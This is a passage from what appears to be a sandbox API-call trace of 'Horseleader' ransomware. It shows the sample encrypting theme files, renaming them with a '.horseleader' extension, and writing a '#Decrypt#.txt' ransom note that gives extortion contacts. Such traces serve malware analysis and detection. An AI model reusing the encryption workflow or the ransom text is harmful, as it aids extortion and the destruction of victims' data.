lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.856] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF") returned 75 [0247.856] StrStrW (lpFirst="SATIN.INF", lpSrch=".txt") returned 0x0 [0247.856] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=456) returned 1 [0247.856] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1c8, lpOverlapped=0x0) returned 1 [0247.857] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.858] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1c8, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1c8, lpOverlapped=0x0) returned 1 [0247.858] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.858] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.858] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.859] CloseHandle (hObject=0x1a4) returned 1 [0247.859] GetProcessHeap () returned 0x780000 [0247.859] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.859] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF.horseleader") returned 87 [0247.859] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\SATIN.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\satin.inf.horseleader")) returned 1 [0247.861] GetProcessHeap () returned 0x780000 [0247.861] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.861] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8573, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.861] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.861] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 78 [0247.861] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.861] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.862] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.862] lstrlenW (lpString=".testttjffg") returned 11 [0247.862] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.862] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.862] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.863] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 78 [0247.863] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.863] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=34163) returned 1 [0247.863] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.870] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.870] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.871] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3573, lpOverlapped=0x0) returned 1 [0247.871] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffca8d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0247.871] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3573, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3573, lpOverlapped=0x0) returned 1 [0247.872] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.872] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.872] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.872] CloseHandle (hObject=0x1a4) returned 1 [0247.873] GetProcessHeap () returned 0x780000 [0247.873] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.873] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.horseleader") returned 90 [0247.873] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.horseleader")) returned 1 [0247.874] GetProcessHeap () returned 0x780000 [0247.874] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.874] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x8573, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.874] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.874] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\#Decrypt#.txt") returned 79 [0247.874] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.875] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.875] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.877] lstrlenA (lpString="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") returned 1368 [0247.877] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.877] CloseHandle (hObject=0x158) returned 1 [0247.878] GetProcessHeap () returned 0x780000 [0247.878] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.878] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="SKY", cAlternateFileName="")) returned 1 [0247.878] lstrcmpiW (lpString1="SKY", lpString2="Windows") returned -1 [0247.878] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY") returned 63 [0247.878] lstrcmpW (lpString1="SKY", lpString2=".") returned 1 [0247.878] lstrcmpW (lpString1="SKY", lpString2="..") returned 1 [0247.878] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.878] GetProcessHeap () returned 0x780000 [0247.879] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7dbfd8 [0247.879] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*") returned 65 [0247.879] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.881] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.881] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\.") returned 65 [0247.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.881] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a980590, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d2c00d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.881] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.881] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\..") returned 66 [0247.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.881] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0247.882] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x3a9, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.882] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.882] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 75 [0247.882] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.882] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.882] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.882] lstrlenW (lpString=".testttjffg") returned 11 [0247.882] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.882] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.882] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.883] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.883] 
lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 75 [0247.884] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.884] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=937) returned 1 [0247.884] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x3a9, lpOverlapped=0x0) returned 1 [0247.896] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffc57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.896] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x3a9, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x3a9, lpOverlapped=0x0) returned 1 [0247.897] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.897] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.897] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.897] CloseHandle (hObject=0x1a4) returned 1 [0247.898] GetProcessHeap () returned 0x780000 [0247.898] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.898] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.horseleader") returned 87 [0247.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.horseleader")) returned 1 [0247.899] GetProcessHeap () returned 0x780000 [0247.899] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.899] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25f0ff00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6d2c00d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x25f0ff00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x1413d, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="SKY.ELM", cAlternateFileName="")) returned 1 [0247.899] lstrcmpiW (lpString1="SKY.ELM", lpString2="Windows") returned -1 [0247.899] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM") returned 71 [0247.899] StrStrIW (lpFirst="SKY.ELM", lpSrch=".horseleader") returned 0x0 [0247.899] lstrcmpW (lpString1="SKY.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.900] lstrcmpW (lpString1="SKY.ELM", lpString2="_uninstalling_.png") returned 1 [0247.900] lstrlenW (lpString=".testttjffg") returned 11 [0247.900] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM", lpSrch=".testttjffg") returned 0x0 [0247.900] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.900] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, 
pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.900] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\sky.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.901] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM") returned 71 [0247.901] StrStrW (lpFirst="SKY.ELM", lpSrch=".txt") returned 0x0 [0247.902] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=82237) returned 1 [0247.902] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.902] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.905] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.906] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.906] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x789e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.906] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.907] SetFilePointerEx (in: hFile=0x1a4, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.907] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.907] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xf13d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.907] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.907] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.908] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.908] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.908] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.908] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.908] CloseHandle (hObject=0x1a4) returned 1 [0247.908] GetProcessHeap () returned 0x780000 [0247.908] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.908] wnsprintfW (in: pszDest=0x7dc820, 
